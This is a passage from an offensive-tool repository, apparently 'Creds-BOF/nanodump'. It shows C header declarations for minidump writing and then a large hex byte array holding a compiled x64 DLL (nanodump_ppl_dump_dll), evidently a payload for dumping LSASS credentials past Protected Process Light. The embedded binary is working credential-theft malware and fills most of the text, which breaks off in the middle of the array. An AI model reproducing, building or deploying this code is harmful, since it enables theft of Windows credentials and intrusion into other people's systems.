        ULONG32 FeatureInformation;
        ULONG32 AMDExtendedCpuFeatures;
#endif
} MiniDumpSystemInfo, *PMiniDumpSystemInfo;

typedef struct _VsFixedFileInfo
{
    ULONG32 dwSignature;
    ULONG32 dwStrucVersion;
    ULONG32 dwFileVersionMS;
    ULONG32 dwFileVersionLS;
    ULONG32 dwProductVersionMS;
    ULONG32 dwProductVersionLS;
    ULONG32 dwFileFlagsMask;
    ULONG32 dwFileFlags;
    ULONG32 dwFileOS;
    ULONG32 dwFileType;
    ULONG32 dwFileSubtype;
    ULONG32 dwFileDateMS;
    ULONG32 dwFileDateLS;
} VsFixedFileInfo, *PVsFixedFileInfo;

typedef struct _MiniDumpLocationDescriptor
{
    ULONG32 DataSize;
    ULONG32 rva;
} MiniDumpLocationDescriptor, *PMiniDumpLocationDescriptor;

typedef struct _MiniDumpModule
{
    ULONG64 BaseOfImage;
    ULONG32 SizeOfImage;
    ULONG32 CheckSum;
    ULONG32 TimeDateStamp;
    ULONG32 ModuleNameRva;
    VsFixedFileInfo VersionInfo;
    MiniDumpLocationDescriptor CvRecord;
    MiniDumpLocationDescriptor MiscRecord;
    ULONG64 Reserved0;
    ULONG64 Reserved1;
} MiniDumpModule, *PMiniDumpModule;

typedef struct _MiniDumpMemoryDescriptor64
{
    struct _MiniDumpMemoryDescriptor64* next;
    ULONG64 StartOfMemoryRange;
    ULONG64 DataSize;
    DWORD   State;
    DWORD   Protect;
    DWORD   Type;
} MiniDumpMemoryDescriptor64, *PMiniDumpMemoryDescriptor64;

VOID writeat(
    IN Pdump_context dc,
    IN ULONG32 rva,
    IN const PVOID data,
    IN unsigned size);

BOOL append(
    IN Pdump_context dc,
    IN const PVOID data,
    IN ULONG32 size);

BOOL write_header(
    IN Pdump_context dc);

BOOL write_directory(
    IN Pdump_context dc,
    IN MiniDumpDirectory directory);

BOOL write_directories(
    IN Pdump_context dc);

BOOL write_system_info_stream(
    IN Pdump_context dc);

//Pmodule_info write_module_list_stream(
//    IN Pdump_context dc);
//
//BOOL is_important_module(
//    IN PVOID address,
//    IN Pmodule_info module_list);
//
//PMiniDumpMemoryDescriptor64 get_memory_ranges(
//    IN Pdump_context dc,
//    IN Pmodule_info module_list);
//
//PMiniDumpMemoryDescriptor64 write_memory64_list_stream(
//    IN Pdump_context dc,
//    IN Pmodule_info module_list);

BOOL NanoDumpWriteDump(
    IN Pdump_context dc);


================================================
FILE: Creds-BOF/nanodump/include/nanodump_ppl_dump_dll.x64.h
================================================
#pragma once

unsigned char nanodump_ppl_dump_dll[] = {0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x64,0x86,0x0B,0x00,0x96,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x00,0x2E,0x22,0x0B,0x02,0x02,0x29,0x00,0xE4,0x00,0x00,0x00,0x22,0x01,0x00,0x00,0x24,0x00,0x00,0x40,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xD0,0x01,0x00,0x00,0x04,0x00,0x00,0x3C,0xA3,0x01,0x00,0x03,0x00,0x60,0x01,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x80,0x01,0x00,0xAE,0x01,0x00,0x00,0x00,0x90,0x01,0x00,0x2C,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x01,0x00,0x70,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x01,0x00,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x1D,0x01,0x00,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x91,0x01,0x00,0xB0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x08,0xE2,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0xE4,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x60,0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0xE8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0xB0,0x14,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x16,0x00,0x00,0x00,0xEA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x70,0x64,0x61,0x74,0x61,0x00,0x00,0x70,0x0B,0x00,0x00,0x00,0x30,0x01,0x00,0x00,0x0C,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x78,0x64,0x61,0x74,0x61,0x00,0x00,0x38,0x09,0x00,0x00,0x00,0x40,0x01,0x00,0x00,0x0A,0x00,0x00,0x00,0x0C,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x62,0x73,0x73,0x00,0x00,0x00,0x00,0x90,0x23,0x00,0x00,0x00,0x50,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0xC0,0x2E,0x65,0x64,0x61,0x74,0x61,0x00,0x00,0xAE,0x01,0x00,0x00,0x00,0x80,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x16,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x69,0x64,0x61,0x74,0x61,0x00,0x00,0x2C,0x07,0x00,0x00,0x00,0x90,0x01,0x00,0x00,0x08,0x00,0x00,0x00,0x18,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x43,0x52,0x54,0x00,0x00,0x00,0x00,0x58,0x00,0x00,0x00,0x00,0xA0,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x20,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x74,0x6C,0x73,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0xB0,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x22,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0x68,0x00,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x24,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x0D,0xF9,0x3F,0x01,0x00,0xE9,0x34,0xDE,0x00,0x00,0x0F,0x1F,0x40,0x00,0x55,0x41,0x56,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCF,0x4D,0x89,0xC4,0x85,0xD2,0x0F,0x85,0x7F,0x00,0x00,0x00,0x8B,0x05,0xE1,0x3F,0x01,0x00,0x85,0xC0,0x7E,0x5E,0x83,0xE8,0x01,0x48,0x8B,0x1D,0x8B,0x0F,0x01,0x00,0x45,0x31,0xE4,0xBF,0x01,0x00,0x00,0x00,0x89,0x05,0xC5,0x3F,0x01,0x00,0x4C,0x8B,0x2D,0x06,0x82,0x01,0x00,0xEB,0x0C,0x0F,0x1F,0x40,0x00,0xB9,0xE8,0x03,0x00,0x00,0x41,0xFF,0xD5,0x4C,0x89,0xE0,0xF0,0x48,0x0F,0xB1,0x3B,0x48,0x89,0xC6,0x48,0x85,0xC0,0x75,0xE8,0x48,0x8B,0x3D,0x61,0x0F,0x01,0x00,0x8B,0x07,0x83,0xF8,0x02,0x0F,0x84,0xC6,0x00,0x00,0x00,0xB9,0x1F,0x00,0x00,0x00,0xE8,0x24,0xDF,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x89,0xD0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x41,0x5E,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xFA,0x01,0x75,0xDF,0x65,0x48,0x8B,0x04,0x25,0x30,0x00,0x00,0x00,0x48,0x8B,0x1D,0x0B,0x0F,0x01,0x00,0x48,0x8B,0x70,0x08,0x45,0x31,0xED,0x4C,0x8B,0x35,0x8D,0x81,0x01,0x00,0xEB,0x14,0x0F,0x1F,0x00,0x48,0x39,0xC6,0x0F,0x84,0x8F,0x00,0x00,0x00,0xB9,0xE8,0x03,0x00,0x00,0x41,0xFF,0xD6,0x4C,0x89,0xE8,0xF0,0x48,0x0F,0xB1,0x33,0x48,0x85,0xC0,0x75,0xE2,0x45,0x31,0xED,0x48,0x8B,0x35,0xE0,0x0E,0x01,0x00,0x8B,0x06,0x83,0xF8,0x01,0x0F,0x84,0xC5,0x00,0x00,0x00,0x8B,0x06,0x85,0xC0,0x74,0x7F,0x8B,0x06,0x83,0xF8,0x01,0x0F,0x84,0x94,0x00,0x00,0x00,0x45,0x85,0xED,0x74,0x5F,0x48,0x8B,0x05,0x68,0x0E,0x01,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x0D,0x4D,0x89,0xE0,0xBA,0x02,0x00,0x00,0x00,0x48,0x89,0xF9,0xFF,0xD0,0x83,0x05,0xD4,0x3E,0x01,0x00,0x01,0xBA,0x01,0x00,0x00,0x00,0xE9,0x4B,0xFF,0xFF,0xFF,0x66,0x90,0x48,0x8D,0x0D,0xA9,0x3E,0x01,0x00,0xE8,0xE4,0xDD,0x00,0x00,0xC7,0x07,0x00,0x00,0x00,0x00,0x48,0x87,0x33,0xE9,0x2A,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x41,0xBD,0x01,0x00,0x00,0x00,0xEB,0x81,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x48,0x87,0x03,0xEB,0x9A,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x89,0x0E,0x01,0x00,0x48,0x8B,0x0D,0x72,0x0E,0x01,0x00,0xC7,0x06,0x01,0x00,0x00,0x00,0xE8,0x17,0xDE,0x00,0x00,0xE9,0x63,0xFF,0xFF,0xFF,0x66,0x90,0x48,0x8B,0x15,0x49,0x0E,0x01,0x00,0x48,0x8B,0x0D,0x32,0x0E,0x01,0x00,0xE8,0xFD,0xDD,0x00,0x00,0xC7,0x06,0x02,0x00,0x00,0x00,0xE9,0x4E,0xFF,0xFF,0xFF,0x66,0x90,0xB9,0x1F,0x00,0x00,0x00,0xE8,0xDE,0xDD,0x00,0x00,0xE9,0x32,0xFF,0xFF,0xFF,0x90,0x55,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x4C,0x8B,0x25,0xC8,0x0D,0x01,0x00,0x48,0x89,0xCE,0x41,0x89,0x14,0x24,0x89,0xD3,0x4C,0x89,0xC7,0x85,0xD2,0x75,0x60,0x8B,0x05,0x0A,0x3E,0x01,0x00,0x85,0xC0,0x74,0x36,0xE8,0x09,0xD0,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0xBA,0xCB,0x00,0x00,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0xE8,0x3F,0xDA,0x00,0x00,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0x41,0x89,0xC5,0xE8,0xCF,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x06,0x0F,0x1F,0x00,0x45,0x31,0xED,0x44,0x89,0xE8,0x41,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x5D,0xC3,0x0F,0x1F,0x44,0x00,0x00,0xE8,0xB3,0xCF,0x00,0x00,0x8D,0x43,0xFF,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0x83,0xF8,0x01,0x77,0x3B,0xE8,0x8E,0xFD,0xFF,0xFF,0x85,0xC0,0x74,0xC2,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0xE8,0xDD,0xD9,0x00,0x00,0x85,0xC0,0x74,0x39,0x83,0xFB,0x01,0x74,0x54,0x49,0x89,0xF8,0xBA,0x02,0x00,0x00,0x00,0x48,0x89,0xF1,0xE8,0x32,0xCB,0x00,0x00,0x41,0x89,0xC5,0xEB,0x9A,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xE8,0x21,0xCB,0x00,0x00,0x41,0x89,0xC5,0x83,0xFB,0x03,0x75,0x86,0xE9,0x5A,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xFB,0x01,0x0F,0x85,0x6F,0xFF,0xFF,0xFF,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x2A,0xFD,0xFF,0xFF,0xE9,0x5D,0xFF,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0xE8,0x5B,0xCC,0x00,0x00,0x49,0x89,0xF8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xF1,0xE8,0xD9,0xCA,0x00,0x00,0x41,0x89,0xC5,0x85,0xC0,0x0F,0x85,0x3B,0xFF,0xFF,0xFF,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0xC1,0xCA,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x46,0xD9,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0xD9,0xFC,0xFF,0xFF,0xE9,0x0F,0xFF,0xFF,0xFF,0x0F,0x1F,0x40,0x00,0x48,0x8B,0x05,0x69,0x0C,0x01,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0xE9,0x8E,0xFE,0xFF,0xFF,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x48,0x89,0xCA,0x48,0x8D,0x0D,0x96,0x3C,0x01,0x00,0xE9,0xF1,0xDA,0x00,0x00,0x90,0x48,0x8D,0x0D,0x09,0x00,0x00,0x00,0xE9,0xE4,0xFF,0xFF,0xFF,0x0F,0x1F,0x40,0x00,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x83,0x7D,0x18,0x00,0x75,0x06,0x48,0x8B,0x45,0x18,0xEB,0x3E,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x28,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x20,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x18,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x20,0x48,0x01,0xC8,0x48,0x29,0xC2,0x48,0x8B,0x45,0xF8,0x48,0x01,0xD0,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x41,0xB8,0x60,0x07,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFE,0xDB,0x00,0x00,0x48,0x8B,0x45,0x28,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x75,0xD8,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0x28,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x37,0xDC,0x00,0x00,0x48,0x8B,0x45,0x28,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2E,0xDC,0x00,0x00,0x48,0x85,0xC0,0x74,0x40,0x48,0x8B,0x45,0x28,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0xD8,0x00,0x00,0x48,0x89,0xC3,0x48,0x8B,0x45,0x28,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x04,0xDC,0x00,0x00,0x48,0x8D,0x50,0x02,0x48,0x8B,0x45,0x20,0x48,0x05,0x08,0x02,0x00,0x00,0x49,0x89,0xD8,0x48,0x89,0xC1,0xE8,0xE3,0xDB,0x00,0x00,0xEB,0x2E,0x48,0x8B,0x45,0x28,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF8,0xD7,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x08,0x02,0x00,0x00,0x48,0x8B,0x45,0x28,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0xB3,0xDB,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x3A,0x48,0x8B,0x45,0x20,0x8B,0x55,0xFC,0x48,0x63,0xD2,0x48,0x81,0xC2,0x00,0x01,0x00,0x00,0x0F,0xB7,0x44,0x50,0x08,0x66,0x83,0xF8,0x2E,0x75,0x1A,0x48,0x8B,0x45,0x20,0x8B,0x55,0xFC,0x48,0x63,0xD2,0x48,0x81,0xC2,0x00,0x01,0x00,0x00,0x66,0xC7,0x44,0x50,0x08,0x00,0x00,0xEB,0x0D,0x83,0x45,0xFC,0x01,0x81,0x7D,0xFC,0x03,0x01,0x00,0x00,0x7E,0xBD,0x48,0x8B,0x45,0x20,0x8B,0x55,0x30,0x89,0x90,0x10,0x04,0x00,0x00,0x48,0x83,0x7D,0x38,0x00,0x74,0x1D,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x14,0x04,0x00,0x00,0x48,0x8B,0x45,0x38,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC2,0xE8,0x0E,0xDB,0x00,0x00,0x48,0x8B,0x45,0x20,0x8B,0x55,0x50,0x89,0x90,0x18,0x05,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x1C,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x20,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x48,0xC7,0x80,0x28,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x30,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x34,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x38,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x40,0x00,0x74,0x55,0x48,0x83,0x7D,0x48,0x00,0x74,0x4E,0x48,0x8B,0x45,0x40,0xBA,0xFF,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAD,0xD6,0x00,0x00,0x89,0x45,0xF8,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x40,0x05,0x00,0x00,0x48,0x8B,0x45,0x40,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0x2D,0xDA,0x00,0x00,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x20,0x48,0x8D,0x88,0x40,0x06,0x00,0x00,0x48,0x8B,0x45,0x48,0x49,0x89,0xD0,0x48,0x89,0xC2,0xE8,0x10,0xDA,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x40,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x54,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0xC7,0x80,0x58,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0xEB,0x33,0x48,0x8B,0x45,0x20,0x0F,0xB6,0x00,0x3C,0x78,0x75,0x19,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x10,0x48,0x8B,0x45,0x18,0x0F,0xB6,0x00,0x38,0xC2,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x83,0x45,0x20,0x01,0x48,0x83,0x45,0x10,0x01,0x48,0x83,0x45,0x18,0x01,0x48,0x8B,0x45,0x20,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xC2,0xB8,0x01,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x3F,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x4D,0x28,0x48,0x8B,0x55,0x20,0x48,0x8B,0x45,0xF0,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x5C,0xFF,0xFF,0xFF,0x85,0xC0,0x74,0x12,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x11,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0x18,0x72,0xB9,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x07,0x00,0x00,0x00,0x48,0x8D,0x15,0xE2,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xDA,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x96,0xF8,0x00,0x00,0x41,0xB8,0x26,0xD4,0x95,0xF4,0x48,0x8D,0x15,0x9F,0xF8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0xFC,0xFF,0xFF,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x09,0x00,0x00,0x00,0x48,0x8D,0x15,0xC3,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xC2,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x7D,0xF8,0x00,0x00,0x41,0xB8,0xBC,0x8F,0x3E,0xA6,0x48,0x8D,0x15,0x84,0xF8,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1D,0xFC,0xFF,0xFF,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x06,0x00,0x00,0x00,0x48,0x8D,0x15,0xAC,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xA2,0xF8,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D,0x6C,0xF8,0x00,0x00,0x41,0xB8,0x87,0x5A,0x1C,0x55,0x48,0x8D,0x15,0x73,0xF8,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC8,0xFB,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x8B,0x55,0xFC,0x89,0x10,0x90,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC0,0x48,0x69,0xD0,0x60,0x07,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0xC7,0x44,0x24,0x30,0x09,0x00,0x00,0x00,0x48,0x8D,0x15,0xF2,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x15,0xF1,0xF7,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4C,0x8D,0x0D